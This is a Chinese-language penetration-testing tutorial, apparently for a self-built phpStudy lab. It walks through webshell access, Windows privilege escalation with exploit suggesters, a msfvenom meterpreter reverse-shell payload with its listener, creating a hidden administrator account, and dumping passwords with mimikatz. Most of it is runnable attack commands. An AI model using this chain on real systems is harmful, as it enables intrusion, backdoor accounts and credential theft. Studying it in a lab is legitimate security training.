本文内容:
- 快速搭建有限制的测试环境
- 信息收集
- 权限提升
- 获取管理员密码
1,快速搭建有限的测试环境
使用phpStudy快速进行环境配置
phpStudy的定义是一个php调式环境的程序集成包:
集成Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境,该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。
下载地址:http://www.phpstudy.net
配置问题:http://phpstudy.php.cn/wenda/388.html
运行库:http://www.php.cn/xiazai/gongju/1351
配置漏洞测试环境:
1.新建用户www:
1.在计算机管理-本地用户和组-用户-新用户。
2.以管理员身份运行cmd,添加用户:net user www 123 /add 可以使用net user查看是否添加成功。
2.权限分配:
1.系统服务-打开网站根目录[上一级]:具有Apache、MySql
2.打开Apache文件夹,选中logs-属性-安全-编辑-添加-检查新添加用户-确定,选中-完全控制-应用。
3.打开MySql文件夹,选中data-属性-安全-编辑-添加-检查新添加用户-确定,选中-完全控制-应用。
3.服务设置登录用户[在系统服务下]:
1.如果服务不存在[Apache、Mysql],可以在phpstudy服务管理器-安装服务。
2.点击Apache-属性-登录-此账户-账户:www-确定-密码:123-应用-确定。
3.点击MySql-属性-登录-此账户-账户:www-确定-密码:123-应用-确定。
2,信息收集:
目的:拿到管理员密码:
1.通过systeminfo,查看系统打了哪些补丁。
2.通过phpMyAdmin漏洞拿到Webshell。
3.权限提升:
使用exp提权补丁进行提权。
使用MSF后渗透测试脚本提权。
3,权限提升:
1.快速找到exp提权补丁进行提权:
1.在线辅助网页:
在线比对补丁查找exp:https://bugs.hacking8.com/tiquan/
2.提权辅助工具:https://github.com/GDSSecurity/Windows-Exploit-Suggester
从漏洞扫描到漏洞利用:
Suggester要求:python安装xlrd。
安装xlrd:pip install xlrd --upgrade
先更新漏洞库:
python windows-exploit-suggester.py --update
扫描systeminfo信息:这个系统可以提权的补丁有哪些:
python windows-exploit-suggester.py --database 2020-05-10-mssb.xls --systeminfo sys.txt
审计本地可利用漏洞信息:
python windows-exploit-suggester.py --audit -l --database 2020-05-10-mssb.xls --systeminfo sys.txt
未使用补丁该系统可能存在的漏洞:
python windows-exploit-suggester.py --database 2019-09-20-mssb.xls --ostext 'Windows 7'
解释:
sys.txt是使用systeminfo命令查找的系统具有哪些补丁,是使用命令 systeminfo >> sys.txt写入的
在吉安频道exp提权补丁,通过Webshell管理工具,上传上去,打开终端,就可以进行提权了。
3.使用exp提权补丁创建用户[验证是否提权成功]
net user a a.1 /add : 添加用户并设置密码
net localgroup administrators a /add : 将用户加入管理组
2.使用MSF信息收集模块-查看提权脚本补丁:
1.创建一个基础木马[稳定会话,php会话不稳定]:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.177.128 lport=1250 -f exe > shell.exe
命令解释:
-p : 指定payload
lhost: 本地IP
lport: 端口
-e :指定编码器
-i :指定编码次数
-f :指定文件类型
2.将保存木马文件,使用Webshell管理工具,上传上去。
3.开启监听:
1.监听模块:use exploit/multi/handler
2.查看设置选项:options [payload]
3.设置payload:set windows/meterpreter/reverse_tcp
4.查看设置选项:options[lhost、lport]
5.设置本机ip:set lhost 127.0.0.1
6.设置端口:set lport 1520
7.开启监听:run
4.在Web Shell管理工具,打开终端,输入:shell.exe
5.拿到回话后本地[提权]信息收集模块:
1.background:将会话放在后台
2.使用session -l 查看具有哪些会话
3.使用本地提权信息收集模块:use post/multi/recon/local_exploit_suggester
4.查看设置选项:options [session]
5.set session 1 [1为session会话序号]
6.运行:run 查看我们可以使用哪一个提权补丁
7.使用提权补丁:use 提权补丁
8.查看设置选项:options [target]
9.查看具有哪些target:show targets [target具有一个的时候,可以不用设置]
10.设置set target 1 [1为target序号]
11.开始提权:run
4,获取管理员密码:
1.通过mimikatz获取管理员密码:
Windows使用命令需要管理员权限:
mimikatz.exe log
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
imikatz # exit
meterpreter >mimikatz_command -f version //查看版本信息
meterpreter > mimikatz_command -f samdump::hashes //读取本地hash
下载地址:https://github.com/gentilkiwi/mimikatz
2.在线解密管理员密码:
* Domain : WIN-06FPCJSH5P8
* LM : 23b982a597a7a732aad3b435b51404ee
* NTLM : 0b6fb439a176cce1fb1d34adfd9571b1c
* SHA1 : bfa75eec175e274ae355f7d0c2ed0620a89e84c5
Windows系统下的hash密码格式为:
用户名:RID
LM-HASH值
NT-HASH值 [存在NT,直接破解 NT]
LM-HASH值都是hash算法
在线解密:https://www.objectif-securite.ch/ophcrack